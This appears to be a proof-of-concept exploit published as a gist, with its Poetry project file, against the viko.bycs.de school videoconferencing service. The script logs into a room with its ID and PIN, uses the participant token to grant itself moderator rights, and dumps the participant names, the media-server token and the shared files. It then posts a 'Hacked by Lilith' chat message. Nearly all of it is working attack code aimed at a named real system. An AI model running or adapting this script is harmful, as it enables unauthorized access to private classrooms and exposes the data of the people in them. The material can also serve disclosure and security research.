import requests
import uuid
from urllib.parse import urlparse
from websocket import create_connection
import json
import jwt
import sys
def get_jwt(authority_server='', room_id="", username="abc", user_session_id="", pin="0"):
    """Log in to a room and return the raw response body.

    Sends one multipart POST to the room login endpoint on
    ``authority_server``. The display name travels in the form body, while
    the room id, the session id and the PIN are path segments of the URL.
    The session id is supplied by the caller, not issued by the server.

    Returns:
        The response text unchanged. The caller treats it as a JWT; the
        HTTP status is not checked here.
    """
    # Browser-like header set, sent exactly as captured.
    request_headers = {
        "accept": "*/*",
        "authority": authority_server,
        "accept-language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7",
        "content-type": "multipart/form-data; boundary=----WebKitFormBoundary5J7BrPSBB3hM3R9A",
        "sec-ch-ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"91\", \"Chromium\";v=\"91\"",
        "sec-ch-ua-mobile": "?0",
        "sec-fetch-dest": "empty",
        "sec-fetch-mode": "cors",
        "sec-fetch-site": "cross-site",
        "sec-gpc": "1",
    }
    # Hand-assembled multipart body with a single "name" field.
    # NOTE(review): username is interpolated verbatim, so a value containing
    # CR/LF or the boundary string would alter the body structure.
    multipart_body = f"------WebKitFormBoundary5J7BrPSBB3hM3R9A\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n{username}\r\n------WebKitFormBoundary5J7BrPSBB3hM3R9A--\r\n"
    login_url = f"https://{authority_server}/api/fsm/admin/{room_id}/login/{user_session_id}/{pin}"
    resp = requests.post(login_url, headers=request_headers, data=multipart_body)
    return resp.text
def get_video_config(room_id):
    """Fetch the video status document of a room from the gateway.

    The request carries no authorization header or cookie; only the room id
    in the URL and in the Referer identifies the room.
    NOTE(review): if the gateway answers this without a session, the data it
    returns is readable by anyone who knows a room id - confirm server-side.

    Returns:
        The decoded JSON body of the response.
    """
    request_headers = {
        "Connection": "keep-alive",
        "sec-ch-ua": '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
        "sec-ch-ua-mobile": "?0",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
        "content-type": "application/json",
        "Accept": "*/*",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Dest": "empty",
        "Referer": f"https://viko.bycs.de/app/raum/{room_id}",
        "Accept-Language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7",
        "dnt": "1",
        "sec-gpc": "1",
    }
    status_url = f"https://viko.bycs.de/api/gateway/room/{room_id}/status/video"
    resp = requests.get(status_url, headers=request_headers)
    return resp.json()
def get_files_shared(authority_server='', room_id=None, jwt=None):
    """Request the file listing of a room and return it as parsed JSON.

    The caller's token is sent as a Bearer credential; no other proof of
    role is attached.
    NOTE(review): the ``jwt`` parameter shadows the imported ``jwt`` module
    inside this function. It is kept because callers pass it by keyword.

    Returns:
        The decoded JSON body of the response.
    """
    request_headers = {
        "authority": authority_server,
        "sec-ch-ua": '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
        "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
        "sec-ch-ua-mobile": "?0",
        # String concatenation on purpose: a missing token raises TypeError
        # instead of sending a malformed credential.
        "authorization": "Bearer " + jwt,
        "accept": "*/*",
        "origin": "https://viko.bycs.de",
        "sec-fetch-site": "cross-site",
        "sec-fetch-mode": "cors",
        "sec-fetch-dest": "empty",
        "referer": "https://viko.bycs.de/",
        "accept-language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7",
        "dnt": "1",
        "sec-gpc": "1",
    }
    files_url = f"https://{authority_server}/api/fsm/room/{room_id}/file"
    resp = requests.get(files_url, headers=request_headers)
    return resp.json()
def make_mod(authority_server='', jwt="", room_id="", user_id=""):
    """Ask the backend to flag ``user_id`` as temporary moderator of a room.

    Sends an empty-bodied POST to the room's tempModerator config endpoint,
    authenticated only with the caller's own Bearer token.
    NOTE(review): the script calls this with a freshly issued participant
    token, so the server must check that the caller already holds moderator
    rights before changing a role. That check is the control under test.

    Returns:
        The response text unchanged. The HTTP status is not checked.
    """
    request_headers = {
        "authority": authority_server,
        "content-length": "0",
        "sec-ch-ua": '" Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91"',
        "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36",
        "sec-ch-ua-mobile": "?0",
        "authorization": "Bearer " + jwt,
        "accept": "*/*",
        "origin": "https://viko.bycs.de",
        "sec-fetch-site": "cross-site",
        "sec-fetch-mode": "cors",
        "sec-fetch-dest": "empty",
        "referer": "https://viko.bycs.de/",
        "accept-language": "en-US,en;q=0.9,de-DE;q=0.8,de;q=0.7",
        "dnt": "1",
        "sec-gpc": "1",
    }
    grant_url = f"https://{authority_server}/api/fsm/room/{room_id}/config/tempModerator/{user_id}/true"
    resp = requests.post(grant_url, headers=request_headers)
    return resp.text
# Room and PIN come from the command line; the display name is fixed.
# NOTE(review): sys.argv is not validated, so a missing argument surfaces
# as IndexError.
ROOM_ID = sys.argv[1]
PIN = sys.argv[2]
USERNAME = "evil_Hacker"

# Look up the room's video configuration; its "fsm" entry names the backend.
video_config = get_video_config(ROOM_ID)
print(video_config)
# Only the host part of the "fsm" URL is used from here on.
server = urlparse(video_config["fsm"]).netloc

# The client picks its own session id (a random UUID) for the login call.
session_user_id = uuid.uuid4()

# Log in and show the token the server handed back.
print("Our JWT:")
jwt_token = get_jwt(server, ROOM_ID, USERNAME, str(session_user_id), PIN)
print(jwt_token)

# Read our own claims. The signature is deliberately not verified because
# the client has no signing key and only needs the "jti" claim. Never copy
# this pattern into code that makes a trust decision from the claims.
decoded_jwt = jwt.decode(
    jwt_token,
    options={"verify_signature": False},
    algorithms=["HS512"],
)
print(decoded_jwt)
ws_connection_id = decoded_jwt["jti"]

# Role-change request, made with the participant token obtained above.
print(make_mod(server, jwt_token, ROOM_ID, ws_connection_id))

# Open the room's own websocket channel (not the Janus media channel).
con = create_connection(f"wss://{server}/websockets/{ROOM_ID}/{ws_connection_id}")

# Authenticate on the socket as a room member.
# NOTE(review): the frame is assembled by string concatenation, so it is
# valid JSON only while none of the values contain a quote or backslash.
auth_frame = (
    '{"type":"auth","name":"' + USERNAME
    + '","userId":"' + ws_connection_id
    + '","token":"' + jwt_token
    + '","sessionId":"' + str(uuid.uuid4())
    + '","t":"' + str(uuid.uuid4())
    + '","anon":false}'
)
con.send(auth_frame)
print(con.recv())

# Ask for the participant list and decode the reply.
con.send('{"request":"participants"}')
participants = json.loads(con.recv())

# The reply also carries a token for the Janus media server.
print(f"\nYour Janus Token is: {participants['token']} \n")

# Everyone currently in the room, by name and id.
print("Users in the room:")
for member in participants["users"]:
    print(f"User:{member['name']} ({member['id']}) ")
print("\n-----------\n")
print("Dump: ")
print(participants)
print("\n-----------\n")

print("Files shared: ")
print(get_files_shared(authority_server=server, room_id=ROOM_ID, jwt=jwt_token))

# Post a chat message to the room and print the server's reply.
# NOTE(review): the socket is never closed explicitly; it is released when
# the process exits.
con.send('{"request":"chatMessage","text":"Hacked by Lilith"}')
print(con.recv())
# Poetry project metadata for the proof-of-concept script in this gist.
[tool.poetry]
name = "csuhack"
version = "0.1.0"
description = ""
authors = ["Lilith Wittmann <mail@lilithwittmann.de>"]
# Runtime dependencies. Caret ranges accept any later compatible release, so
# reproducible installs depend on a committed lock file.
[tool.poetry.dependencies]
python = "^3.7"
requests = "^2.25.1"
# NOTE(review): the script imports create_connection from the "websocket"
# module, which websocket-client provides. The separate "websocket"
# distribution presumably installs a module of the same name, so declaring
# both risks one shadowing the other. Confirm and drop the unused one.
websocket = "^0.2.1"
websocket-client = "^1.1.0"
# Used by the script only to read token claims with verify_signature=False.
PyJWT = "^2.1.0"
[tool.poetry.dev-dependencies]
[build-system]
requires = ["poetry-core>=1.0.0"]
build-backend = "poetry.core.masonry.api"